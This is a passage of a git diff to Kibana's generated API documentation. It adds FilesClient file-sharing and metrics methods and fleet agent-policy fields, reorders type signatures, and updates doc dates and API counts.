+ "parentPluginId": "files", + "id": "def-public.FilesClient.find.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- File filters" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, { "parentPluginId": "files", "id": "def-public.FilesClient.update", @@ -286,6 +335,246 @@ "deprecated": false } ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.share", + "type": "Function", + "tags": [ + "note" + ], + "label": "share", + "description": [ + "\nShare a file by creating a new file share instance.\n" + ], + "signature": [ + "(args: { validUntil?: number | undefined; name?: string | undefined; } & { fileId: string; }) => Promise<", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileShareJSONWithToken", + "text": "FileShareJSONWithToken" + }, + ">" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.share.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- File share arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.unshare", + "type": "Function", + "tags": [], + "label": "unshare", + "description": [ + "\nDelete a file share instance.\n" + ], + "signature": [ + "(args: { id: string; }) => Promise<{ ok: true; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.unshare.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- File unshare arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getShare", + "type": "Function", + "tags": [], + "label": "getShare", + "description": [ + "\nGet a file share instance.\n" + ], + "signature": [ + "(args: { id: string; }) => Promise<{ share: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileShareJSON", + "text": "FileShareJSON" + }, + "; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getShare.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get file share arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.listShares", + "type": "Function", + "tags": [], + "label": "listShares", + "description": [ + "\nList all file shares. Optionally scoping to a specific\nfile.\n" + ], + "signature": [ + "(args: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.Pagination", + "text": "Pagination" + }, + " & { forFileId?: string | undefined; }) => Promise<{ shares: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileShareJSON", + "text": "FileShareJSON" + }, + "[]; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.listShares.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get file share arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getMetrics", + "type": "Function", + "tags": [], + "label": "getMetrics", + "description": [ + "\nGet metrics of file system, like storage usage.\n" + ], + "signature": [ + "(args: unknown) => Promise<", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FilesMetrics", + "text": "FilesMetrics" + }, + ">" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getMetrics.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get metrics arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.publicDownload", + "type": "Function", + "tags": [], + "label": "publicDownload", + "description": [ + "\nDownload a file, bypassing regular security by way of a\nsecret share token.\n" + ], + "signature": [ + "(args: { fileName?: string | undefined; } & { token: string; }) => Promise" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.publicDownload.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get public download arguments." + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] } ], "initialIsOpen": false @@ -460,7 +749,61 @@ "\nAn elasticsearch client that will be used to interact with the cluster" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -528,7 +867,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -554,33 +893,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -606,33 +919,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1592,6 +1879,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/files.mdx b/api_docs/files.mdx index be8f115621294..f9e1ebaf95e22 100644 --- a/api_docs/files.mdx +++ b/api_docs/files.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/files title: "files" image: https://source.unsplash.com/400x175/?github description: API docs for the files plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'files'] --- import filesObj from './files.devdocs.json'; @@ -21,7 +21,7 @@ Contact [@elastic/kibana-app-services](https://github.com/orgs/elastic/teams/tea | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 222 | 0 | 3 | 2 | +| 236 | 0 | 3 | 2 | ## Client diff --git a/api_docs/fleet.devdocs.json b/api_docs/fleet.devdocs.json index 31a71fc3ae753..08581064a4d00 100644 --- a/api_docs/fleet.devdocs.json +++ b/api_docs/fleet.devdocs.json @@ -8942,6 +8942,16 @@ "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", "deprecated": false }, + { + "parentPluginId": "fleet", + "id": "def-common.FullAgentPolicyInput.package_policy_id", + "type": "string", + "tags": [], + "label": "package_policy_id", + "description": [], + "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", + "deprecated": false + }, { "parentPluginId": "fleet", "id": "def-common.FullAgentPolicyInput.meta", @@ -10256,6 +10266,19 @@ ], "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", "deprecated": false + }, + { + "parentPluginId": "fleet", + "id": "def-common.NewAgentPolicy.schema_version", + "type": "string", + "tags": [], + "label": "schema_version", + "description": [], + "signature": [ + "string | undefined" + ], + "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", + "deprecated": false } ], "initialIsOpen": false @@ -13910,7 +13933,7 @@ "label": "RegistrySearchResult", "description": [], "signature": [ - "{ type?: \"integration\" | undefined; name: string; path: string; version: string; title: string; download: string; description: string; icons?: (", + "{ type?: \"integration\" | undefined; path: string; download: string; title: string; description: string; icons?: (", { "pluginId": "fleet", "scope": "common", @@ -13934,7 +13957,7 @@ "section": "def-common.PackageSpecCategory", "text": "PackageSpecCategory" }, - " | undefined)[] | undefined; internal?: boolean | undefined; release?: \"experimental\" | \"beta\" | \"ga\" | undefined; policy_templates?: ", + " | undefined)[] | undefined; name: string; version: string; internal?: boolean | undefined; release?: \"experimental\" | \"beta\" | \"ga\" | undefined; policy_templates?: ", { "pluginId": "fleet", "scope": "common", diff --git a/api_docs/fleet.mdx b/api_docs/fleet.mdx index cec2044d1369d..883c4fd9502fe 100644 --- a/api_docs/fleet.mdx +++ b/api_docs/fleet.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/fleet title: "fleet" image: https://source.unsplash.com/400x175/?github description: API docs for the fleet plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'fleet'] --- import fleetObj from './fleet.devdocs.json'; @@ -21,7 +21,7 @@ Contact [Fleet](https://github.com/orgs/elastic/teams/fleet) for questions regar | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 955 | 3 | 860 | 9 | +| 957 | 3 | 862 | 9 | ## Client diff --git a/api_docs/global_search.mdx b/api_docs/global_search.mdx index 56126fc7bbda7..8c980b9b1487a 100644 --- a/api_docs/global_search.mdx +++ b/api_docs/global_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/globalSearch title: "globalSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the globalSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'globalSearch'] --- import globalSearchObj from './global_search.devdocs.json'; diff --git a/api_docs/home.devdocs.json b/api_docs/home.devdocs.json index 14a039d123e3d..907464f15b49b 100644 --- a/api_docs/home.devdocs.json +++ b/api_docs/home.devdocs.json @@ -375,7 +375,7 @@ "{@link FeatureCatalogueCategory} to display this feature in." ], "signature": [ - "\"other\" | \"data\" | \"admin\"" + "\"data\" | \"other\" | \"admin\"" ], "path": "src/plugins/home/public/services/feature_catalogue/feature_catalogue_registry.ts", "deprecated": false @@ -708,7 +708,7 @@ "label": "FeatureCatalogueCategory", "description": [], "signature": [ - "\"other\" | \"data\" | \"admin\"" + "\"data\" | \"other\" | \"admin\"" ], "path": "src/plugins/home/public/services/feature_catalogue/feature_catalogue_registry.ts", "deprecated": false, @@ -1598,7 +1598,7 @@ "label": "InstructionSetSchema", "description": [], "signature": [ - "{ readonly title?: string | undefined; readonly callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; readonly statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; readonly instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }" + "{ readonly title?: string | undefined; readonly callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; readonly statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; readonly instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }" ], "path": "src/plugins/home/server/services/tutorials/lib/tutorial_schema.ts", "deprecated": false, @@ -1612,7 +1612,7 @@ "label": "InstructionsSchema", "description": [], "signature": [ - "{ readonly params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; readonly instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }" + "{ readonly params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; readonly instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }" ], "path": "src/plugins/home/server/services/tutorials/lib/tutorial_schema.ts", "deprecated": false, @@ -1628,7 +1628,7 @@ "signature": [ "{ getSampleDatasets: () => ", "Writable", - "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", + "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", "SavedObject", "[]) => void; addAppLinksToSampleDataset: (id: string, appLinks: ", { @@ -1662,7 +1662,7 @@ "signature": [ "() => ", "Writable", - "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>" + "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>" ], "path": "src/plugins/home/server/services/sample_data/lib/sample_dataset_registry_types.ts", "deprecated": false, @@ -1716,7 +1716,7 @@ "section": "def-server.TutorialContext", "text": "TutorialContext" }, - ") => Readonly<{ isBeta?: boolean | undefined; savedObjects?: any[] | undefined; euiIconType?: string | undefined; previewImagePath?: string | undefined; moduleName?: string | undefined; completionTimeMinutes?: number | undefined; elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; artifacts?: Readonly<{ application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; savedObjectsInstallMsg?: string | undefined; customStatusCheckName?: string | undefined; integrationBrowserCategories?: string[] | undefined; eprPackageOverlap?: string | undefined; } & { id: string; name: string; category: \"other\" | \"security\" | \"metrics\" | \"logging\"; shortDescription: string; longDescription: string; onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }>" + ") => Readonly<{ isBeta?: boolean | undefined; savedObjects?: any[] | undefined; euiIconType?: string | undefined; previewImagePath?: string | undefined; moduleName?: string | undefined; completionTimeMinutes?: number | undefined; elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; artifacts?: Readonly<{ application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; savedObjectsInstallMsg?: string | undefined; customStatusCheckName?: string | undefined; integrationBrowserCategories?: string[] | undefined; eprPackageOverlap?: string | undefined; } & { id: string; name: string; category: \"other\" | \"security\" | \"metrics\" | \"logging\"; shortDescription: string; longDescription: string; onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }>" ], "path": "src/plugins/home/server/services/tutorials/lib/tutorials_registry_types.ts", "deprecated": false, @@ -1752,7 +1752,7 @@ "label": "TutorialSchema", "description": [], "signature": [ - "{ readonly isBeta?: boolean | undefined; readonly savedObjects?: any[] | undefined; readonly euiIconType?: string | undefined; readonly previewImagePath?: string | undefined; readonly moduleName?: string | undefined; readonly completionTimeMinutes?: number | undefined; readonly elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly artifacts?: Readonly<{ application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; readonly savedObjectsInstallMsg?: string | undefined; readonly customStatusCheckName?: string | undefined; readonly integrationBrowserCategories?: string[] | undefined; readonly eprPackageOverlap?: string | undefined; readonly id: string; readonly name: string; readonly category: \"other\" | \"security\" | \"metrics\" | \"logging\"; readonly shortDescription: string; readonly longDescription: string; readonly onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }" + "{ readonly isBeta?: boolean | undefined; readonly savedObjects?: any[] | undefined; readonly euiIconType?: string | undefined; readonly previewImagePath?: string | undefined; readonly moduleName?: string | undefined; readonly completionTimeMinutes?: number | undefined; readonly elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | 